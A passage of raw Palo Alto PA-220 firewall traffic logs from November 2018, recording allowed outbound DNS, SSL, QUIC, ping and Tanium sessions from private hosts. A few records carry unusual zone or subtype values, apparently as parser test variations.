States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:40 PA-220 1,2018/11/30 
16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:40,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 
